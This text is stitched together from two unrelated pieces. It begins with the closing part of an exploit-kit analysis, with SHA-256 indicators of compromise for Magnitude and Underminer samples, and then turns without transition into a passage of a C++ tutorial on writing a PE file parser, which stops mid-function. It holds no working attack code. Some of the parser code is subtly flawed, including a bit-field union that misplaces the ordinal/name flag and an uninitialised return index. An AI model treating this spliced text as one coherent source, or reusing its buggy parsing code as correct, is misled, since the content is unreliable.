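To attach some purely illustrative numbers to the cost argument above: if a full Chrome exploit chain (a renderer bug plus a sandbox escape) costs several hundred thousand dollars on the gray market, and a successful ransomware infection nets, say, a couple of thousand dollars, the attackers would need hundreds of paying victims just to break even, before they have paid for a single ad impression or server. These are made-up numbers, but they show why burning an expensive zero-day on a short-lived malvertising campaign is a risky investment.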

Indicators of Compromise (IoCs)

Magnitude
SHA-256 Note
71179e5677cbdfd8ab85507f90d403afb747fba0e2188b15bd70aac3144ae61a CVE-2021-21224 exploit
a7135b92fc8072d0ad9a4d36e81a6b6b78f1528558ef0b19cb51502b50cffe6d CVE-2021-21224 exploit
6c7ae2c24eaeed1cac0a35101498d87c914c262f2e0c2cd9350237929d3e1191 CVE-2021-31956 exploit
8c52d4a8f76e1604911cff7f6618ffaba330324490156a464a8ceaf9b590b40a payload injector
8ff658257649703ee3226c1748bbe9a2d5ab19f9ea640c52fc7d801744299676 payload injector
Underminer
SHA-256 Note
2ac255e1e7a93e6709de3bbefbc4e7955af44dbc6f977b60618237282b1fb970 CVE-2021-21224 exploit
9552e0819f24deeea876ba3e7d5eff2d215ce0d3e1f043095a6b1db70327a3d2 HiddenBee loader
7a3ba9b9905f3e59e99b107e329980ea1c562a5522f5c8f362340473ebf2ac6d HiddenBee module container
2595f4607fad7be0a36cb328345a18f344be0c89ab2f98d1828d4154d68365f8 amd64/coredll.bin
ed7e6318efa905f71614987942a94df56fd0e17c63d035738daf97895e8182ab amd64/pcs.bin
c2c51aa8317286c79c4d012952015c382420e4d9049914c367d6e72d81185494 CVE-2019-0808 exploit
d88371c41fc25c723b4706719090f5c8b93aad30f762f62f2afcd09dd3089169 CVE-2020-1020 exploit
b201fd9a3622aff0b0d64e829c9d838b5f150a9b20a600e087602b5cdb11e7d3 CVE-2020-1054 exploit


A dive into the PE file format - LAB 1: Writing a PE Parser

By: 0xRick
29 October 2021 at 01:00


Introduction

In the previous posts we’ve discussed the basic structure of PE files. In this post we’re going to apply that knowledge by building a PE file parser in C++ as a proof of concept.

The parser we’re going to build will not be a full parser and is not intended to be used as a reliable tool; this is only an exercise to better understand the PE file structure.
We’re going to focus on PE32 and PE32+ files, and we’ll only parse the following parts of the file:

  • DOS Header
  • Rich Header
  • NT Headers
  • Data Directories (within the Optional Header)
  • Section Headers
  • Import Table
  • Base Relocations Table

The code of this project can be found on my github profile.


Initial Setup

Process Outline

We want our parser to follow this process:

  1. Read a file.
  2. Validate that it’s a PE file.
  3. Determine whether it’s a PE32 or a PE32+.
  4. Parse out the following structures:
    • DOS Header
    • Rich Header
    • NT Headers
    • Section Headers
    • Import Data Directory
    • Base Relocation Data Directory
  5. Print out the following information:
    • File name and type.
    • DOS Header:
      • Magic value.
      • Address of new exe header.
    • Each entry of the Rich Header, decrypted and decoded.
    • NT Headers - PE file signature.
    • NT Headers - File Header:
      • Machine value.
      • Number of sections.
      • Size of Optional Header.
    • NT Headers - Optional Header:
      • Magic value.
      • Size of code section.
      • Size of initialized data.
      • Size of uninitialized data.
      • Address of entry point.
      • RVA of start of code section.
      • Desired Image Base.
      • Section alignment.
      • File alignment.
      • Size of image.
      • Size of headers.
    • For each Data Directory: its name, RVA and size.
    • For each Section Header:
      • Section name.
      • Section virtual address and size.
      • Section raw data pointer and size.
      • Section characteristics value.
    • Import Table:
      • For each DLL:
        • DLL name.
        • ILT and IAT RVAs.
        • Whether it’s a bound import or not.
        • For every imported function:
          • Ordinal if ordinal/name flag is 1.
          • Name, hint and Hint/Name table RVA if ordinal/name flag is 0.
    • Base Relocation Table:
      • For each block:
        • Page RVA.
        • Block size.
        • Number of entries.
        • For each entry:
          • Raw value.
          • Relocation offset.
          • Relocation Type.

winnt.h Definitions

We will need the following definitions from the winnt.h header:

  • Types:
    • BYTE
    • WORD
    • DWORD
    • QWORD
    • LONG
    • LONGLONG
    • ULONGLONG
  • Constants:
    • IMAGE_NT_OPTIONAL_HDR32_MAGIC
    • IMAGE_NT_OPTIONAL_HDR64_MAGIC
    • IMAGE_NUMBEROF_DIRECTORY_ENTRIES
    • IMAGE_DOS_SIGNATURE
    • IMAGE_DIRECTORY_ENTRY_EXPORT
    • IMAGE_DIRECTORY_ENTRY_IMPORT
    • IMAGE_DIRECTORY_ENTRY_RESOURCE
    • IMAGE_DIRECTORY_ENTRY_EXCEPTION
    • IMAGE_DIRECTORY_ENTRY_SECURITY
    • IMAGE_DIRECTORY_ENTRY_BASERELOC
    • IMAGE_DIRECTORY_ENTRY_DEBUG
    • IMAGE_DIRECTORY_ENTRY_ARCHITECTURE
    • IMAGE_DIRECTORY_ENTRY_GLOBALPTR
    • IMAGE_DIRECTORY_ENTRY_TLS
    • IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
    • IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT
    • IMAGE_DIRECTORY_ENTRY_IAT
    • IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT
    • IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
    • IMAGE_SIZEOF_SHORT_NAME
    • IMAGE_SIZEOF_SECTION_HEADER
  • Structures:
    • IMAGE_DOS_HEADER
    • IMAGE_DATA_DIRECTORY
    • IMAGE_OPTIONAL_HEADER32
    • IMAGE_OPTIONAL_HEADER64
    • IMAGE_FILE_HEADER
    • IMAGE_NT_HEADERS32
    • IMAGE_NT_HEADERS64
    • IMAGE_IMPORT_DESCRIPTOR
    • IMAGE_IMPORT_BY_NAME
    • IMAGE_BASE_RELOCATION
    • IMAGE_SECTION_HEADER

I took these definitions from winnt.h and added them to a new header called winntdef.h.

winntdef.h:

typedef unsigned char BYTE;
typedef unsigned short WORD;
typedef unsigned long DWORD;
typedef unsigned long long QWORD;
typedef unsigned long LONG;
typedef __int64 LONGLONG;
typedef unsigned __int64 ULONGLONG;

#define ___IMAGE_NT_OPTIONAL_HDR32_MAGIC       0x10b
#define ___IMAGE_NT_OPTIONAL_HDR64_MAGIC       0x20b
#define ___IMAGE_NUMBEROF_DIRECTORY_ENTRIES    16
#define ___IMAGE_DOS_SIGNATURE                 0x5A4D

#define ___IMAGE_DIRECTORY_ENTRY_EXPORT          0
#define ___IMAGE_DIRECTORY_ENTRY_IMPORT          1
#define ___IMAGE_DIRECTORY_ENTRY_RESOURCE        2
#define ___IMAGE_DIRECTORY_ENTRY_EXCEPTION       3
#define ___IMAGE_DIRECTORY_ENTRY_SECURITY        4
#define ___IMAGE_DIRECTORY_ENTRY_BASERELOC       5
#define ___IMAGE_DIRECTORY_ENTRY_DEBUG           6
#define ___IMAGE_DIRECTORY_ENTRY_ARCHITECTURE    7
#define ___IMAGE_DIRECTORY_ENTRY_GLOBALPTR       8
#define ___IMAGE_DIRECTORY_ENTRY_TLS             9
#define ___IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG    10
#define ___IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT   11
#define ___IMAGE_DIRECTORY_ENTRY_IAT            12
#define ___IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT   13
#define ___IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR 14

#define ___IMAGE_SIZEOF_SHORT_NAME              8
#define ___IMAGE_SIZEOF_SECTION_HEADER          40

typedef struct __IMAGE_DOS_HEADER {
    WORD   e_magic;
    WORD   e_cblp;
    WORD   e_cp;
    WORD   e_crlc;
    WORD   e_cparhdr;
    WORD   e_minalloc;
    WORD   e_maxalloc;
    WORD   e_ss;
    WORD   e_sp;
    WORD   e_csum;
    WORD   e_ip;
    WORD   e_cs;
    WORD   e_lfarlc;
    WORD   e_ovno;
    WORD   e_res[4];
    WORD   e_oemid;
    WORD   e_oeminfo;
    WORD   e_res2[10];
    LONG   e_lfanew;
} ___IMAGE_DOS_HEADER, * ___PIMAGE_DOS_HEADER;

typedef struct __IMAGE_DATA_DIRECTORY {
    DWORD   VirtualAddress;
    DWORD   Size;
} ___IMAGE_DATA_DIRECTORY, * ___PIMAGE_DATA_DIRECTORY;


typedef struct __IMAGE_OPTIONAL_HEADER {
    WORD    Magic;
    BYTE    MajorLinkerVersion;
    BYTE    MinorLinkerVersion;
    DWORD   SizeOfCode;
    DWORD   SizeOfInitializedData;
    DWORD   SizeOfUninitializedData;
    DWORD   AddressOfEntryPoint;
    DWORD   BaseOfCode;
    DWORD   BaseOfData;
    DWORD   ImageBase;
    DWORD   SectionAlignment;
    DWORD   FileAlignment;
    WORD    MajorOperatingSystemVersion;
    WORD    MinorOperatingSystemVersion;
    WORD    MajorImageVersion;
    WORD    MinorImageVersion;
    WORD    MajorSubsystemVersion;
    WORD    MinorSubsystemVersion;
    DWORD   Win32VersionValue;
    DWORD   SizeOfImage;
    DWORD   SizeOfHeaders;
    DWORD   CheckSum;
    WORD    Subsystem;
    WORD    DllCharacteristics;
    DWORD   SizeOfStackReserve;
    DWORD   SizeOfStackCommit;
    DWORD   SizeOfHeapReserve;
    DWORD   SizeOfHeapCommit;
    DWORD   LoaderFlags;
    DWORD   NumberOfRvaAndSizes;
    ___IMAGE_DATA_DIRECTORY DataDirectory[___IMAGE_NUMBEROF_DIRECTORY_ENTRIES];
} ___IMAGE_OPTIONAL_HEADER32, * ___PIMAGE_OPTIONAL_HEADER32;

typedef struct __IMAGE_OPTIONAL_HEADER64 {
    WORD        Magic;
    BYTE        MajorLinkerVersion;
    BYTE        MinorLinkerVersion;
    DWORD       SizeOfCode;
    DWORD       SizeOfInitializedData;
    DWORD       SizeOfUninitializedData;
    DWORD       AddressOfEntryPoint;
    DWORD       BaseOfCode;
    ULONGLONG   ImageBase;
    DWORD       SectionAlignment;
    DWORD       FileAlignment;
    WORD        MajorOperatingSystemVersion;
    WORD        MinorOperatingSystemVersion;
    WORD        MajorImageVersion;
    WORD        MinorImageVersion;
    WORD        MajorSubsystemVersion;
    WORD        MinorSubsystemVersion;
    DWORD       Win32VersionValue;
    DWORD       SizeOfImage;
    DWORD       SizeOfHeaders;
    DWORD       CheckSum;
    WORD        Subsystem;
    WORD        DllCharacteristics;
    ULONGLONG   SizeOfStackReserve;
    ULONGLONG   SizeOfStackCommit;
    ULONGLONG   SizeOfHeapReserve;
    ULONGLONG   SizeOfHeapCommit;
    DWORD       LoaderFlags;
    DWORD       NumberOfRvaAndSizes;
    ___IMAGE_DATA_DIRECTORY DataDirectory[___IMAGE_NUMBEROF_DIRECTORY_ENTRIES];
} ___IMAGE_OPTIONAL_HEADER64, * ___PIMAGE_OPTIONAL_HEADER64;

typedef struct __IMAGE_FILE_HEADER {
    WORD    Machine;
    WORD    NumberOfSections;
    DWORD   TimeDateStamp;
    DWORD   PointerToSymbolTable;
    DWORD   NumberOfSymbols;
    WORD    SizeOfOptionalHeader;
    WORD    Characteristics;
} ___IMAGE_FILE_HEADER, * ___PIMAGE_FILE_HEADER;

typedef struct __IMAGE_NT_HEADERS64 {
    DWORD Signature;
    ___IMAGE_FILE_HEADER FileHeader;
    ___IMAGE_OPTIONAL_HEADER64 OptionalHeader;
} ___IMAGE_NT_HEADERS64, * ___PIMAGE_NT_HEADERS64;

typedef struct __IMAGE_NT_HEADERS {
    DWORD Signature;
    ___IMAGE_FILE_HEADER FileHeader;
    ___IMAGE_OPTIONAL_HEADER32 OptionalHeader;
} ___IMAGE_NT_HEADERS32, * ___PIMAGE_NT_HEADERS32;

typedef struct __IMAGE_IMPORT_DESCRIPTOR {
    union {
        DWORD   Characteristics;
        DWORD   OriginalFirstThunk;
    } DUMMYUNIONNAME;
    DWORD   TimeDateStamp;
    DWORD   ForwarderChain;
    DWORD   Name;
    DWORD   FirstThunk;
} ___IMAGE_IMPORT_DESCRIPTOR, * ___PIMAGE_IMPORT_DESCRIPTOR;

typedef struct __IMAGE_IMPORT_BY_NAME {
    WORD    Hint;
    char   Name[100];
} ___IMAGE_IMPORT_BY_NAME, * ___PIMAGE_IMPORT_BY_NAME;

typedef struct __IMAGE_BASE_RELOCATION {
    DWORD   VirtualAddress;
    DWORD   SizeOfBlock;
} ___IMAGE_BASE_RELOCATION, * ___PIMAGE_BASE_RELOCATION;

typedef struct __IMAGE_SECTION_HEADER {
    BYTE    Name[___IMAGE_SIZEOF_SHORT_NAME];
    union {
        DWORD   PhysicalAddress;
        DWORD   VirtualSize;
    } Misc;
    DWORD   VirtualAddress;
    DWORD   SizeOfRawData;
    DWORD   PointerToRawData;
    DWORD   PointerToRelocations;
    DWORD   PointerToLinenumbers;
    WORD    NumberOfRelocations;
    WORD    NumberOfLinenumbers;
    DWORD   Characteristics;
} ___IMAGE_SECTION_HEADER, * ___PIMAGE_SECTION_HEADER;

Custom Structures

I defined the following structures to help with the parsing process. They’re defined in the PEFILE_CUSTOM_STRUCTS.h header.

RICH_HEADER_INFO

A structure to hold information about the Rich Header during processing.

typedef struct __RICH_HEADER_INFO {
    int size;
    char* ptrToBuffer;
    int entries;
} RICH_HEADER_INFO, * PRICH_HEADER_INFO;
  • size: Size of the Rich Header (in bytes).
  • ptrToBuffer: A pointer to the buffer containing the data of the Rich Header.
  • entries: Number of entries in the Rich Header.
RICH_HEADER_ENTRY

A structure to represent a Rich Header entry.

typedef struct __RICH_HEADER_ENTRY {
    WORD  prodID;
    WORD  buildID;
    DWORD useCount;
} RICH_HEADER_ENTRY, * PRICH_HEADER_ENTRY;
  • prodID: Type ID / Product ID.
  • buildID: Build ID.
  • useCount: Use count.
RICH_HEADER

A structure to represent the Rich Header.

typedef struct __RICH_HEADER {
    PRICH_HEADER_ENTRY entries;
} RICH_HEADER, * PRICH_HEADER;
  • entries: A pointer to a RICH_HEADER_ENTRY array.
ILT_ENTRY_32

A structure to represent a 32-bit ILT entry during processing.

typedef struct __ILT_ENTRY_32 {
    union {
        DWORD ORDINAL : 16;
        DWORD HINT_NAME_TABE : 32;
        DWORD ORDINAL_NAME_FLAG : 1;
    } FIELD_1;
} ILT_ENTRY_32, * PILT_ENTRY_32;

The structure will hold a 32-bit value and will return the appropriate piece of information (using bit fields) when the member corresponding to that piece of information is accessed.
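
As a rough usage sketch (not code taken from the parser itself), an ILT entry read from the file can be viewed through this union. Since the ordinal/name flag is the most significant bit of the 32-bit entry, it can also be tested with an explicit shift, which sidesteps any compiler-specific bit-field layout concerns:

ILT_ENTRY_32 entry;
fread(&entry, sizeof(ILT_ENTRY_32), 1, Ppefile);

DWORD raw = entry.FIELD_1.HINT_NAME_TABE;       // the full 32-bit entry
if ((raw >> 31) & 1) {
    WORD ordinal = entry.FIELD_1.ORDINAL;       // import by ordinal: low 16 bits
}
else {
    DWORD hintNameRVA = raw & 0x7FFFFFFF;       // import by name: RVA of the Hint/Name entry
}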

ILT_ENTRY_64

A structure to represent a 64-bit ILT entry during processing.

typedef struct __ILT_ENTRY_64 {
    union {
        DWORD ORDINAL : 16;
        DWORD HINT_NAME_TABE : 32;
    } FIELD_2;
    DWORD ORDINAL_NAME_FLAG : 1;
} ILT_ENTRY_64, * PILT_ENTRY_64;

The structure will hold a 64-bit value and will return the appropriate piece of information (using bit fields) when the member corresponding to that piece of information is accessed.

BASE_RELOC_ENTRY

A structure to represent a base relocation entry during processing.

typedef struct __BASE_RELOC_ENTRY {
    WORD OFFSET : 12;
    WORD TYPE : 4;
} BASE_RELOC_ENTRY, * PBASE_RELOC_ENTRY;
  • OFFSET: Relocation offset.
  • TYPE: Relocation type.
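
A quick usage sketch (assuming MSVC’s usual low-to-high bit-field allocation, which matches how relocation entries are laid out on disk): each entry is a 16-bit value whose low 12 bits are the offset into the block’s page and whose high 4 bits are the relocation type.

BASE_RELOC_ENTRY entry;
fread(&entry, sizeof(BASE_RELOC_ENTRY), 1, Ppefile);

WORD offset = entry.OFFSET;   // low 12 bits: offset within the block's page
WORD type   = entry.TYPE;     // high 4 bits: e.g. IMAGE_REL_BASED_DIR64 (10)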

PEFILE

Our parser will represent a PE file as an object of one of two classes: PE32FILE or PE64FILE.
These two classes only differ in some member definitions, but their functionality is identical.
Throughout this post we will use the code from PE64FILE.

Definition

The class is defined as follows:

class PE64FILE
{
public:
    PE64FILE(char* _NAME, FILE* Ppefile);
	
    void PrintInfo();

private:
    char* NAME;
    FILE* Ppefile;
    int _import_directory_count, _import_directory_size;
    int _basreloc_directory_count;

    // HEADERS
    ___IMAGE_DOS_HEADER     PEFILE_DOS_HEADER;
    ___IMAGE_NT_HEADERS64   PEFILE_NT_HEADERS;

    // DOS HEADER
    DWORD PEFILE_DOS_HEADER_EMAGIC;
    LONG  PEFILE_DOS_HEADER_LFANEW;

    // RICH HEADER
    RICH_HEADER_INFO PEFILE_RICH_HEADER_INFO;
    RICH_HEADER PEFILE_RICH_HEADER;

    // NT_HEADERS.Signature
    DWORD PEFILE_NT_HEADERS_SIGNATURE;

    // NT_HEADERS.FileHeader
    WORD PEFILE_NT_HEADERS_FILE_HEADER_MACHINE;
    WORD PEFILE_NT_HEADERS_FILE_HEADER_NUMBER0F_SECTIONS;
    WORD PEFILE_NT_HEADERS_FILE_HEADER_SIZEOF_OPTIONAL_HEADER;

    // NT_HEADERS.OptionalHeader
    DWORD PEFILE_NT_HEADERS_OPTIONAL_HEADER_MAGIC;
    DWORD PEFILE_NT_HEADERS_OPTIONAL_HEADER_SIZEOF_CODE;
    DWORD PEFILE_NT_HEADERS_OPTIONAL_HEADER_SIZEOF_INITIALIZED_DATA;
    DWORD PEFILE_NT_HEADERS_OPTIONAL_HEADER_SIZEOF_UNINITIALIZED_DATA;
    DWORD PEFILE_NT_HEADERS_OPTIONAL_HEADER_ADDRESSOF_ENTRYPOINT;
    DWORD PEFILE_NT_HEADERS_OPTIONAL_HEADER_BASEOF_CODE;
    ULONGLONG PEFILE_NT_HEADERS_OPTIONAL_HEADER_IMAGEBASE;
    DWORD PEFILE_NT_HEADERS_OPTIONAL_HEADER_SECTION_ALIGNMENT;
    DWORD PEFILE_NT_HEADERS_OPTIONAL_HEADER_FILE_ALIGNMENT;
    DWORD PEFILE_NT_HEADERS_OPTIONAL_HEADER_SIZEOF_IMAGE;
    DWORD PEFILE_NT_HEADERS_OPTIONAL_HEADER_SIZEOF_HEADERS;

    ___IMAGE_DATA_DIRECTORY PEFILE_EXPORT_DIRECTORY;
    ___IMAGE_DATA_DIRECTORY PEFILE_IMPORT_DIRECTORY;
    ___IMAGE_DATA_DIRECTORY PEFILE_RESOURCE_DIRECTORY;
    ___IMAGE_DATA_DIRECTORY PEFILE_EXCEPTION_DIRECTORY;
    ___IMAGE_DATA_DIRECTORY PEFILE_SECURITY_DIRECTORY;
    ___IMAGE_DATA_DIRECTORY PEFILE_BASERELOC_DIRECTORY;
    ___IMAGE_DATA_DIRECTORY PEFILE_DEBUG_DIRECTORY;
    ___IMAGE_DATA_DIRECTORY PEFILE_ARCHITECTURE_DIRECTORY;
    ___IMAGE_DATA_DIRECTORY PEFILE_GLOBALPTR_DIRECTORY;
    ___IMAGE_DATA_DIRECTORY PEFILE_TLS_DIRECTORY;
    ___IMAGE_DATA_DIRECTORY PEFILE_LOAD_CONFIG_DIRECTORY;
    ___IMAGE_DATA_DIRECTORY PEFILE_BOUND_IMPORT_DIRECTORY;
    ___IMAGE_DATA_DIRECTORY PEFILE_IAT_DIRECTORY;
    ___IMAGE_DATA_DIRECTORY PEFILE_DELAY_IMPORT_DIRECTORY;
    ___IMAGE_DATA_DIRECTORY PEFILE_COM_DESCRIPTOR_DIRECTORY;

    // SECTION HEADERS
    ___PIMAGE_SECTION_HEADER PEFILE_SECTION_HEADERS;

    // IMPORT TABLE
    ___PIMAGE_IMPORT_DESCRIPTOR PEFILE_IMPORT_TABLE;
    
    // BASE RELOCATION TABLE
    ___PIMAGE_BASE_RELOCATION PEFILE_BASERELOC_TABLE;

    // FUNCTIONS
    
    // ADDRESS RESOLVERS
    int  locate(DWORD VA);
    DWORD resolve(DWORD VA, int index);

    // PARSERS
    void ParseFile();
    void ParseDOSHeader();
    void ParseNTHeaders();
    void ParseSectionHeaders();
    void ParseImportDirectory();
    void ParseBaseReloc();
    void ParseRichHeader();

    // PRINT INFO
    void PrintFileInfo();
    void PrintDOSHeaderInfo();
    void PrintRichHeaderInfo();
    void PrintNTHeadersInfo();
    void PrintSectionHeadersInfo();
    void PrintImportTableInfo();
    void PrintBaseRelocationsInfo();
};

The only public member besides the class constructor is a function called PrintInfo(), which prints information about the file.

The class constructor takes two parameters, a char array representing the name of the file and a file pointer to the actual data of the file.

After that comes a long series of variable definitions. These class members are going to be used internally during the parsing process, and we’ll mention each of them later.

At the end is a series of method definitions. The first two methods are called locate and resolve; I will talk about them in a minute.
The rest are functions responsible for parsing different parts of the file, and functions responsible for printing information about those same parts.

Constructor

The constructor of the class simply sets the file pointer and name variables, then it calls the ParseFile() function.

PE64FILE::PE64FILE(char* _NAME, FILE* _Ppefile) {
	
	NAME = _NAME;
	Ppefile = _Ppefile;

	ParseFile();

}

The ParseFile() function calls the other parser functions:

void PE64FILE::ParseFile() {

	// PARSE DOS HEADER
	ParseDOSHeader();

	// PARSE RICH HEADER
	ParseRichHeader();

	//PARSE NT HEADERS
	ParseNTHeaders();

	// PARSE SECTION HEADERS
	ParseSectionHeaders();

	// PARSE IMPORT DIRECTORY
	ParseImportDirectory();

	// PARSE BASE RELOCATIONS
	ParseBaseReloc();

}

Resolving RVAs

Most of the time, we’ll have an RVA that we’ll need to convert to a file offset.
The process of resolving an RVA can be outlined as follows:

  1. Determine which section range contains that RVA:
    • Iterate over all sections and for each section compare the RVA to the section virtual address and to the section virtual address added to the virtual size of the section.
    • If the RVA exists within this range then it belongs to that section.
  2. Calculate the file offset:
    • Subtract the section virtual address from the RVA.
    • Add that value to the raw data pointer of the section.

An example of this is locating a Data Directory.
The IMAGE_DATA_DIRECTORY structure only gives us an RVA of the directory, to locate that directory we’ll need to resolve that address.

I wrote two functions to do this, first one to locate the virtual address (locate()), second one to resolve the address (resolve()).

int PE64FILE::locate(DWORD VA) {
	
	int index;
	
	for (int i = 0; i < PEFILE_NT_HEADERS_FILE_HEADER_NUMBER0F_SECTIONS; i++) {
		if (VA >= PEFILE_SECTION_HEADERS[i].VirtualAddress
			&& VA < (PEFILE_SECTION_HEADERS[i].VirtualAddress + PEFILE_SECTION_HEADERS[i].Misc.VirtualSize)){
			index = i;
			break;
		}
	}
	return index;
}

DWORD PE64FILE::resolve(DWORD VA, int index) {

	return (VA - PEFILE_SECTION_HEADERS[index].VirtualAddress) + PEFILE_SECTION_HEADERS[index].PointerToRawData;

}

locate() iterates over the PEFILE_SECTION_HEADERS array, compares the RVA as described above, then it returns the index of the appropriate section header within the PEFILE_SECTION_HEADERS array.

Please note that in order for these functions to work we’ll need to parse out the section headers and fill the PEFILE_SECTION_HEADERS array first.
We still haven’t discussed this part, but I wanted to talk about the address resolvers first.

main function

The main function of the program is fairly simple; it only does two things:

  • Create a file pointer to the given file, and validate that the file was read correctly.
  • Call INITPARSE() on the file, and based on the return value it decides between three actions:
    • Exit.
    • Create a PE32FILE object, call PrintInfo(), close the file pointer then exit.
    • Create a PE64FILE object, call PrintInfo(), close the file pointer then exit.

PrintInfo() calls the other print info functions.

int main(int argc, char* argv[])
{
	if (argc != 2) {
		printf("Usage: %s [path to executable]\n", argv[0]);
		return 1;
	}

	FILE * PpeFile;
	fopen_s(&PpeFile, argv[1], "rb");

	if (PpeFile == NULL) {
		printf("Can't open file.\n");
		return 1;
	}

	if (INITPARSE(PpeFile) == 1) {
		exit(1);
	}
	else if (INITPARSE(PpeFile) == 32) {
		PE32FILE PeFile_1(argv[1], PpeFile);
		PeFile_1.PrintInfo();
		fclose(PpeFile);
		exit(0);
	}
	else if (INITPARSE(PpeFile) == 64) {
		PE64FILE PeFile_1(argv[1], PpeFile);
		PeFile_1.PrintInfo();
		fclose(PpeFile);
		exit(0);
	}

	return 0;
}

INITPARSE()

INITPARSE() is a function defined in PEFILE.cpp.
Its only job is to validate that the given file is a PE file, then determine whether the file is PE32 or PE32+.

It reads the DOS Header of the file and checks the MZ signature (e_magic); if it’s not found, it returns an error.

After that check, it sets the file position to (DOS_HEADER.e_lfanew + size of a DWORD (the PE signature) + size of the File Header), which is the exact offset of the beginning of the Optional Header.
Then it reads a WORD. We know that the first WORD of the Optional Header is a magic value that indicates the file type, so it compares that WORD to IMAGE_NT_OPTIONAL_HDR32_MAGIC and IMAGE_NT_OPTIONAL_HDR64_MAGIC, and based on the result it either returns 32 or 64 (indicating PE32 or PE32+), or it returns an error.

int INITPARSE(FILE* PpeFile) {

	___IMAGE_DOS_HEADER TMP_DOS_HEADER;
	WORD PEFILE_TYPE;

	fseek(PpeFile, 0, SEEK_SET);
	fread(&TMP_DOS_HEADER, sizeof(___IMAGE_DOS_HEADER), 1, PpeFile);

	if (TMP_DOS_HEADER.e_magic != ___IMAGE_DOS_SIGNATURE) {
		printf("Error. Not a PE file.\n");
		return 1;
	}

	fseek(PpeFile, (TMP_DOS_HEADER.e_lfanew + sizeof(DWORD) + sizeof(___IMAGE_FILE_HEADER)), SEEK_SET);
	fread(&PEFILE_TYPE, sizeof(WORD), 1, PpeFile);

	if (PEFILE_TYPE == ___IMAGE_NT_OPTIONAL_HDR32_MAGIC) {
		return 32;
	}
	else if (PEFILE_TYPE == ___IMAGE_NT_OPTIONAL_HDR64_MAGIC) {
		return 64;
	}
	else {
		printf("Error while parsing IMAGE_OPTIONAL_HEADER.Magic. Unknown Type.\n");
		return 1;
	}

}

Parsing DOS Header

ParseDOSHeader()

Parsing out the DOS Header is nothing complicated; we just need to read a number of bytes equal to the size of the DOS Header from the beginning of the file, then assign that data to the pre-defined class member PEFILE_DOS_HEADER.
From there we can access all of the struct members, however we’re only interested in e_magic and e_lfanew.

void PE64FILE::ParseDOSHeader() {
	
	fseek(Ppefile, 0, SEEK_SET);
	fread(&PEFILE_DOS_HEADER, sizeof(___IMAGE_DOS_HEADER), 1, Ppefile);

	PEFILE_DOS_HEADER_EMAGIC = PEFILE_DOS_HEADER.e_magic;
	PEFILE_DOS_HEADER_LFANEW = PEFILE_DOS_HEADER.e_lfanew;

}

PrintDOSHeaderInfo()

This function prints e_magic and e_lfanew values.

void PE64FILE::PrintDOSHeaderInfo() {
	
	printf(" DOS HEADER:\n");
	printf(" -----------\n\n");

	printf(" Magic: 0x%X\n", PEFILE_DOS_HEADER_EMAGIC);
	printf(" File address of new exe header: 0x%X\n", PEFILE_DOS_HEADER_LFANEW);

}


Parsing Rich Header

Process

To parse out the Rich Header we’ll need to go through multiple steps.

We don’t know anything about the Rich Header, we don’t know its size, we don’t know where it’s exactly located, we don’t even know if the file we’re processing contains a Rich Header in the first place.

First of all, we need to locate the Rich Header.
We don’t know the exact location, however we have everything we need to locate it.
We know that if a Rich Header exists, then it has to exist between the DOS Stub and the PE signature or the beginning of the NT Headers.
We also know that any Rich Header ends with a 32-bit value Rich followed by the XOR key.

One might rely on the fixed size of the DOS Header and the DOS Stub, however, the default DOS Stub message can be changed, so that size is not guaranteed to be fixed.
A better approach is to read from the beginning of the file to the start of the NT Headers, then search through that buffer for the Rich sequence. If it’s found, we’ve successfully located the end of the Rich Header; if not, the file most likely doesn’t contain a Rich Header.

Once we’ve located the end of the Rich Header, we can read the XOR key, then go backwards starting from the Rich signature and keep XORing 4 bytes at a time until we reach the DanS signature which indicates the beginning of the Rich Header.

After obtaining the position and the size of the Rich Header, we can normally read and process the data.

ParseRichHeader()

This function starts by allocating a buffer on the heap, then it reads e_lfanew bytes from the beginning of the file and stores the data in that buffer.

It then goes through a loop where it does a linear search byte by byte. In each iteration it compares the current byte and the byte that follows it to 0x52 (R) and 0x69 (i).
When the sequence is found, it stores the index in a variable and the loop breaks.

	char* dataPtr = new char[PEFILE_DOS_HEADER_LFANEW];
	fseek(Ppefile, 0, SEEK_SET);
	fread(dataPtr, PEFILE_DOS_HEADER_LFANEW, 1, Ppefile);

	int index_ = 0;

	for (int i = 0; i <= PEFILE_DOS_HEADER_LFANEW; i++) {
		if (dataPtr[i] == 0x52 && dataPtr[i + 1] == 0x69) {
			index_ = i;
			break;
		}
	}

	if (index_ == 0) {
		printf("Error while parsing Rich Header.");
		PEFILE_RICH_HEADER_INFO.entries = 0;
		return;
	}

After that it reads the XOR key, then goes into the decryption loop where in each iteration it increments RichHeaderSize by 4 until it reaches the DanS sequence.

	char key[4];
	memcpy(key, dataPtr + (index_ + 4), 4);

	int indexpointer = index_ - 4;
	int RichHeaderSize = 0;

	while (true) {
		char tmpchar[4];
		memcpy(tmpchar, dataPtr + indexpointer, 4);

		for (int i = 0; i < 4; i++) {
			tmpchar[i] = tmpchar[i] ^ key[i];
		}

		indexpointer -= 4;
		RichHeaderSize += 4;

		if (tmpchar[1] == 0x61 && tmpchar[0] == 0x44) {
			break;
		}
	}

After obtaining the size and the position, it allocates a new buffer for the Rich Header, reads and decrypts the Rich Header, updates PEFILE_RICH_HEADER_INFO with the appropriate data pointer, size and number of entries, then finally it deallocates the buffer it was using for processing.

	char* RichHeaderPtr = new char[RichHeaderSize];
	memcpy(RichHeaderPtr, dataPtr + (index_ - RichHeaderSize), RichHeaderSize);

	for (int i = 0; i < RichHeaderSize; i += 4) {

		for (int x = 0; x < 4; x++) {
			RichHeaderPtr[i + x] = RichHeaderPtr[i + x] ^ key[x];
		}

	}

	PEFILE_RICH_HEADER_INFO.size = RichHeaderSize;
	PEFILE_RICH_HEADER_INFO.ptrToBuffer = RichHeaderPtr;
	PEFILE_RICH_HEADER_INFO.entries = (RichHeaderSize - 16) / 8;

	delete[] dataPtr;

The rest of the function reads each entry of the Rich Header and updates PEFILE_RICH_HEADER.

	PEFILE_RICH_HEADER.entries = new RICH_HEADER_ENTRY[PEFILE_RICH_HEADER_INFO.entries];

	for (int i = 16; i < RichHeaderSize; i += 8) {
		WORD PRODID = (uint16_t)((unsigned char)RichHeaderPtr[i + 3] << 8) | (unsigned char)RichHeaderPtr[i + 2];
